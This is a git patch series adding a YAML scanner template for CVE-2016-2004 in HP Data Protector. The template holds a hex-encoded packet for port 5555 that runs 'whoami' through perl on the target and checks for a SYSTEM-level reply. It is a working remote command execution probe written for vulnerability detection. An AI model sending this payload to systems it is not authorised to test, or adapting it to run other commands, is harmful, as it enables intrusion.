From ac814bc151dddaec0ed8ffae4f77b1e4b38d5077 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 25 Jul 2021 02:11:44 +0530 Subject: [PATCH 1/3] Add files via upload --- network/CVE-2016-2004.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 network/CVE-2016-2004.yaml diff --git a/network/CVE-2016-2004.yaml b/network/CVE-2016-2004.yaml new file mode 100644 index 0000000000..e024780180 --- /dev/null +++ b/network/CVE-2016-2004.yaml @@ -0,0 +1,19 @@ +id: CVE-2016-2004 +info: + name: HP Data Protector A.09.00 - Arbitrary Command Execution + author: pussycat0x + severity: critical + tags: network,iot,hp + description: Arbitrary Command Execution on HP Data Protector + reference: https://www.exploit-db.com/exploits/39858 +network: + - inputs: + - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" + type: hex + host: + - "{{Hostname}}:5555" + matchers: + - type: word + encoding: hex + words: + - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" \ No newline at end of file From a9fdbe851e5ecb837185917a9eed9320188285b9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 25 Jul 2021 02:19:36 +0530 Subject: [PATCH 2/3] Update CVE-2016-2004.yaml --- network/CVE-2016-2004.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/CVE-2016-2004.yaml b/network/CVE-2016-2004.yaml index e024780180..5eef2aeb61 100644 --- a/network/CVE-2016-2004.yaml +++ b/network/CVE-2016-2004.yaml @@ -14,6 +14,6 @@ network: - "{{Hostname}}:5555" matchers: - type: word - encoding: hex + encoding: hex words: - - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" \ No newline at end of file + - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" From 4658f7ffcca0515e48042302629e6776ff7d894c Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 25 Jul 2021 22:11:36 +0530 Subject: [PATCH 3/3] moving files around --- cves/2016/CVE-2016-2004.yaml | 25 +++++++++++++++++++++++++ network/CVE-2016-2004.yaml | 19 ------------------- 2 files changed, 25 insertions(+), 19 deletions(-) create mode 100644 cves/2016/CVE-2016-2004.yaml delete mode 100644 network/CVE-2016-2004.yaml diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml new file mode 100644 index 0000000000..41a2a7d60f --- /dev/null +++ b/cves/2016/CVE-2016-2004.yaml @@ -0,0 +1,25 @@ +id: CVE-2016-2004 + +info: + name: HP Data Protector A.09.00 - Arbitrary Command Execution + author: pussycat0x + severity: critical + tags: cve,cve2016,network,iot,hp,rce + description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. + reference: | + - https://www.exploit-db.com/exploits/39858 + - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 + +network: + - inputs: + - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami + type: hex + + host: + - "{{Hostname}}:5555" + + matchers: + - type: word + encoding: hex + words: + - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system \ No newline at end of file diff --git a/network/CVE-2016-2004.yaml b/network/CVE-2016-2004.yaml deleted file mode 100644 index 5eef2aeb61..0000000000 --- a/network/CVE-2016-2004.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: CVE-2016-2004 -info: - name: HP Data Protector A.09.00 - Arbitrary Command Execution - author: pussycat0x - severity: critical - tags: network,iot,hp - description: Arbitrary Command Execution on HP Data Protector - reference: https://www.exploit-db.com/exploits/39858 -network: - - inputs: - - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" - type: hex - host: - - "{{Hostname}}:5555" - matchers: - - type: word - encoding: hex - words: - - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000"